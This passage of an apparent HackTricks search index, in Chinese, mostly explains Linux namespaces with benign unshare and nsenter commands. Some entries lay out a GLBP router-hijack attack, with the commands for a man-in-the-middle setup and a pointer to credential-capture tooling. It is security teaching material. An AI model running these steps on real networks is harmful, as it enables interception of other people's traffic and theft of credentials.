及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 创建不同的命名空间","id":"1676","title":"创建不同的命名空间"},"1677":{"body":"bash ls -l /proc/self/ns/cgroup\\nlrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> \'cgroup:[4026531835]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 检查您的进程所在的命名空间","id":"1677","title":"检查您的进程所在的命名空间"},"1678":{"body":"bash sudo find /proc -maxdepth 3 -type l -name cgroup -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 查找所有 CGroup 命名空间","id":"1678","title":"查找所有 CGroup 命名空间"},"1679":{"body":"bash nsenter -C TARGET_PID --pid /bin/bash 您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/cgroup)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 进入 CGroup 命名空间","id":"1679","title":"进入 CGroup 命名空间"},"168":{"body":"GLBP的特点是通过使用单个虚拟IP和多个虚拟MAC地址在路由器之间实现负载分配。在GLBP组中,每个路由器都参与数据包转发。与HSRP/VRRP不同,GLBP通过多种机制提供真正的负载均衡: Host-Dependent Load Balancing: 为主机保持一致的AVF MAC地址分配,这对稳定的NAT配置至关重要。 Round-Robin Load Balancing: 默认方法,在请求主机之间交替分配AVF MAC地址。 Weighted Round-Robin Load Balancing: 根据预定义的“权重”指标分配负载。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Operations and Load Distribution","id":"168","title":"GLBP Operations and Load Distribution"},"1680":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » References","id":"1680","title":"References"},"1681":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » IPC Namespace","id":"1681","title":"IPC Namespace"},"1682":{"body":"IPC(进程间通信)命名空间是一个Linux内核特性,提供 隔离 System V IPC对象,如消息队列、共享内存段和信号量。这种隔离确保 不同IPC命名空间中的进程无法直接访问或修改彼此的IPC对象 ,为进程组之间提供额外的安全性和隐私保护。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 基本信息","id":"1682","title":"基本信息"},"1683":{"body":"当创建一个新的IPC命名空间时,它会以 完全隔离的System V IPC对象集 开始。这意味着在新的IPC命名空间中运行的进程默认无法访问或干扰其他命名空间或主机系统中的IPC对象。 在命名空间内创建的IPC对象仅对 该命名空间内的进程可见和可访问 。每个IPC对象在其命名空间内由唯一的键标识。尽管在不同命名空间中键可能相同,但对象本身是隔离的,无法跨命名空间访问。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWIPC标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新命名空间或创建一个时,它将开始使用与该命名空间关联的IPC对象。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 工作原理:","id":"1683","title":"工作原理:"},"1684":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 实验:","id":"1684","title":"实验:"},"1685":{"body":"CLI bash sudo unshare -i [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。/bin/bash 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,允许 /bin/bash 及其子进程在不遇到内存分配错误的情况下运行。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 创建不同的命名空间","id":"1685","title":"创建不同的命名空间"},"1686":{"body":"bash ls -l /proc/self/ns/ipc\\nlrwxrwxrwx 1 root root 0 Apr 4 20:37 /proc/self/ns/ipc -> \'ipc:[4026531839]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 检查您的进程所在的命名空间","id":"1686","title":"检查您的进程所在的命名空间"},"1687":{"body":"bash sudo find /proc -maxdepth 3 -type l -name ipc -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name ipc -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 查找所有 IPC 命名空间","id":"1687","title":"查找所有 IPC 命名空间"},"1688":{"body":"bash nsenter -i TARGET_PID --pid /bin/bash 此外,您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/net)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 进入 IPC 命名空间","id":"1688","title":"进入 IPC 命名空间"},"1689":{"body":"bash # Container\\nsudo unshare -i /bin/bash\\nipcmk -M 100\\nShared memory id: 0\\nipcs -m ------ Shared Memory Segments --------\\nkey shmid owner perms bytes nattch status\\n0x2fba9021 0 root 644 100 0 # From the host\\nipcs -m # Nothing is seen","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 创建 IPC 对象","id":"1689","title":"创建 IPC 对象"},"169":{"body":"AVG (Active Virtual Gateway): 主要路由器,负责将MAC地址分配给对等路由器。 AVF (Active Virtual Forwarder): 指定管理网络流量的路由器。 GLBP Priority: 决定AVG的指标,默认值为100,范围在1到255之间。 GLBP Weight: 反映路由器的当前负载,可以手动或通过对象跟踪进行调整。 GLBP Virtual IP Address: 作为所有连接设备的网络默认网关。 对于交互,GLBP使用保留的组播地址224.0.0.102和UDP端口3222。路由器每3秒发送一次“hello”数据包,如果在10秒内错过一个数据包,则被视为非操作状态。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Key Components and Terminologies in GLBP","id":"169","title":"Key Components and Terminologies in GLBP"},"1690":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 参考","id":"1690","title":"参考"},"1691":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » PID Namespace","id":"1691","title":"PID Namespace"},"1692":{"body":"PID(进程标识符)命名空间是Linux内核中的一个特性,通过使一组进程拥有自己独特的PID集合,与其他命名空间中的PID分开,从而提供进程隔离。这在容器化中尤为重要,因为进程隔离对于安全性和资源管理至关重要。 当创建一个新的PID命名空间时,该命名空间中的第一个进程被分配PID 1。这个进程成为新命名空间的“init”进程,负责管理该命名空间内的其他进程。在命名空间内创建的每个后续进程将拥有该命名空间内的唯一PID,这些PID将独立于其他命名空间中的PID。 从PID命名空间内进程的角度来看,它只能看到同一命名空间中的其他进程。它无法感知其他命名空间中的进程,也无法使用传统的进程管理工具(例如,kill、wait等)与它们交互。这提供了一种隔离级别,有助于防止进程相互干扰。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 基本信息","id":"1692","title":"基本信息"},"1693":{"body":"当创建一个新进程时(例如,通过使用clone()系统调用),该进程可以被分配到一个新的或现有的PID命名空间。 如果创建了一个新命名空间,该进程将成为该命名空间的“init”进程 。 内核 维护一个 新命名空间中的PID与父命名空间中相应PID之间的映射 (即,从中创建新命名空间的命名空间)。这个映射 允许内核在必要时翻译PID ,例如,在不同命名空间中的进程之间发送信号时。 PID命名空间中的进程只能看到并与同一命名空间中的其他进程交互 。它们无法感知其他命名空间中的进程,并且它们的PID在其命名空间内是唯一的。 当 PID命名空间被销毁 (例如,当命名空间的“init”进程退出时), 该命名空间内的所有进程都将被终止 。这确保与命名空间相关的所有资源都得到妥善清理。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 工作原理:","id":"1693","title":"工作原理:"},"1694":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 实验:","id":"1694","title":"实验:"},"1695":{"body":"CLI bash sudo unshare -pf --mount-proc /bin/bash 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许一个进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程处于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。/bin/bash 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 创建不同的命名空间","id":"1695","title":"创建不同的命名空间"},"1696":{"body":"bash ls -l /proc/self/ns/pid\\nlrwxrwxrwx 1 root root 0 Apr 3 18:45 /proc/self/ns/pid -> \'pid:[4026532412]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 检查您的进程所在的命名空间","id":"1696","title":"检查您的进程所在的命名空间"},"1697":{"body":"bash sudo find /proc -maxdepth 3 -type l -name pid -exec readlink {} \\\\; 2>/dev/null | sort -u 注意,初始(默认)PID 命名空间中的 root 用户可以看到所有进程,包括新 PID 命名空间中的进程,这就是我们可以看到所有 PID 命名空间的原因。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 查找所有 PID 命名空间","id":"1697","title":"查找所有 PID 命名空间"},"1698":{"body":"bash nsenter -t TARGET_PID --pid /bin/bash 当你从默认命名空间进入一个 PID 命名空间时,你仍然能够看到所有的进程。而来自该 PID 命名空间的进程将能够看到新的 bash 进程。 此外,你只能 在你是 root 的情况下进入另一个进程的 PID 命名空间 。并且你 不能 进入 其他命名空间 而没有指向它的描述符 (如 /proc/self/ns/pid)","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 进入 PID 命名空间","id":"1698","title":"进入 PID 命名空间"},"1699":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » References","id":"1699","title":"References"},"17":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 值观与常见问题","id":"17","title":"HackTricks 值观与常见问题"},"170":{"body":"攻击者可以通过发送优先级值最高(255)的GLBP数据包成为主路由器。这可能导致DoS或MITM攻击,从而允许流量拦截或重定向。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Attack Mechanism","id":"170","title":"GLBP Attack Mechanism"},"1700":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » Mount Namespace","id":"1700","title":"Mount Namespace"},"1701":{"body":"挂载命名空间是一个Linux内核特性,它提供了一个进程组所看到的文件系统挂载点的隔离。每个挂载命名空间都有自己的一组文件系统挂载点, 对一个命名空间中挂载点的更改不会影响其他命名空间 。这意味着在不同挂载命名空间中运行的进程可以对文件系统层次结构有不同的视图。 挂载命名空间在容器化中特别有用,其中每个容器应该有自己的文件系统和配置,与其他容器和主机系统隔离。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 基本信息","id":"1701","title":"基本信息"},"1702":{"body":"当创建一个新的挂载命名空间时,它会用 来自其父命名空间的挂载点的副本 进行初始化。这意味着在创建时,新的命名空间与其父命名空间共享相同的文件系统视图。然而,命名空间内的任何后续挂载点更改将不会影响父命名空间或其他命名空间。 当一个进程在其命名空间内修改挂载点,例如挂载或卸载文件系统时, 更改仅限于该命名空间 ,不会影响其他命名空间。这允许每个命名空间拥有自己的独立文件系统层次结构。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWNS标志的unshare()或clone()系统调用创建新的命名空间。当一个进程移动到一个新命名空间或创建一个新命名空间时,它将开始使用与该命名空间关联的挂载点。 文件描述符和inode在命名空间之间是共享的 ,这意味着如果一个命名空间中的进程有一个指向文件的打开文件描述符,它可以 将该文件描述符传递给另一个命名空间中的进程 ,并且 两个进程将访问同一个文件 。然而,由于挂载点的差异,文件的路径在两个命名空间中可能并不相同。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 工作原理:","id":"1702","title":"工作原理:"},"1703":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 实验:","id":"1703","title":"实验:"},"1704":{"body":"CLI bash sudo unshare -m [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 创建不同的命名空间","id":"1704","title":"创建不同的命名空间"},"1705":{"body":"bash ls -l /proc/self/ns/mnt\\nlrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/mnt -> \'mnt:[4026531841]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 检查您的进程所在的命名空间","id":"1705","title":"检查您的进程所在的命名空间"},"1706":{"body":"bash sudo find /proc -maxdepth 3 -type l -name mnt -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name mnt -exec ls -l {} \\\\; 2>/dev/null | grep bash findmnt","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 查找所有挂载命名空间","id":"1706","title":"查找所有挂载命名空间"},"1707":{"body":"bash nsenter -m TARGET_PID --pid /bin/bash 此外,您只能 进入另一个进程命名空间,如果您是 root 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/mnt)。 因为新挂载仅在命名空间内可访问,所以命名空间可能包含只能从中访问的敏感信息。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 进入挂载命名空间","id":"1707","title":"进入挂载命名空间"},"1708":{"body":"bash # Generate new mount ns\\nunshare -m /bin/bash\\nmkdir /tmp/mount_ns_example\\nmount -t tmpfs tmpfs /tmp/mount_ns_example\\nmount | grep tmpfs # \\"tmpfs on /tmp/mount_ns_example\\"\\necho test > /tmp/mount_ns_example/test\\nls /tmp/mount_ns_example/test # Exists # From the host\\nmount | grep tmpfs # Cannot see \\"tmpfs on /tmp/mount_ns_example\\"\\nls /tmp/mount_ns_example/test # Doesn\'t exist # findmnt # List existing mounts\\nTARGET SOURCE FSTYPE OPTIONS\\n/ /dev/mapper/web05--vg-root # unshare --mount # run a shell in a new mount namespace\\n# mount --bind /usr/bin/ /mnt/\\n# ls /mnt/cp\\n/mnt/cp\\n# exit # exit the shell, and hence the mount namespace\\n# ls /mnt/cp\\nls: cannot access \'/mnt/cp\': No such file or directory ## Notice there\'s different files in /tmp\\n# ls /tmp\\nrevshell.elf # ls /mnt/tmp\\nkrb5cc_75401103_X5yEyy\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-apache2.service-77w9dT\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-systemd-resolved.service-RnMUhT\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-systemd-timesyncd.service-FAnDql\\nvmware-root_662-2689143848","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 挂载某些内容","id":"1708","title":"挂载某些内容"},"1709":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 参考","id":"1709","title":"参考"},"171":{"body":"Loki 可以通过注入优先级和权重设置为255的数据包来执行GLBP攻击。攻击前的步骤包括使用Wireshark等工具收集虚拟IP地址、身份验证存在性和路由器优先级值等信息。 攻击步骤: 切换到混杂模式并启用IP转发。 确定目标路由器并获取其IP。 生成一个无偿ARP。 注入一个恶意GLBP数据包,冒充AVG。 为攻击者的网络接口分配一个次要IP地址,镜像GLBP虚拟IP。 实施SNAT以实现完整的流量可见性。 调整路由以确保通过原始AVG路由器继续访问互联网。 通过遵循这些步骤,攻击者将自己定位为“中间人”,能够拦截和分析网络流量,包括未加密或敏感数据。 为了演示,以下是所需的命令片段: bash # Enable promiscuous mode and IP forwarding\\nsudo ip link set eth0 promisc on\\nsudo sysctl -w net.ipv4.ip_forward=1 # Configure secondary IP and SNAT\\nsudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0\\nsudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Adjust routing\\nsudo route del default\\nsudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 监控和拦截流量可以使用 net-creds.py 或类似工具来捕获和分析流经被攻陷网络的数据。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Executing a GLBP Attack with Loki","id":"171","title":"Executing a GLBP Attack with Loki"},"1710":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 网络命名空间","id":"1710","title":"网络命名空间"},"1711":{"body":"网络命名空间是一个Linux内核特性,提供网络栈的隔离,允许 每个网络命名空间拥有自己的独立网络配置 、接口、IP地址、路由表和防火墙规则。这种隔离在各种场景中非常有用,例如容器化,其中每个容器应具有自己的网络配置,与其他容器和主机系统独立。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 基本信息","id":"1711","title":"基本信息"},"1712":{"body":"当创建一个新的网络命名空间时,它将以 完全隔离的网络栈 开始,除了回环接口(lo)外 没有网络接口 。这意味着在新的网络命名空间中运行的进程默认无法与其他命名空间或主机系统中的进程通信。 虚拟网络接口 ,如veth对,可以在网络命名空间之间创建和移动。这允许在命名空间之间或命名空间与主机系统之间建立网络连接。例如,veth对的一端可以放置在容器的网络命名空间中,另一端可以连接到主机命名空间中的 桥接 或其他网络接口,为容器提供网络连接。 命名空间内的网络接口可以拥有 自己的IP地址、路由表和防火墙规则 ,与其他命名空间独立。这允许不同网络命名空间中的进程具有不同的网络配置,并像在独立的网络系统上运行一样操作。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWNET标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的网络配置和接口。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 工作原理:","id":"1712","title":"工作原理:"},"1713":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 实验:","id":"1713","title":"实验:"},"1714":{"body":"CLI bash sudo unshare -n [--mount-proc] /bin/bash\\n# Run ifconfig or ip -a 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 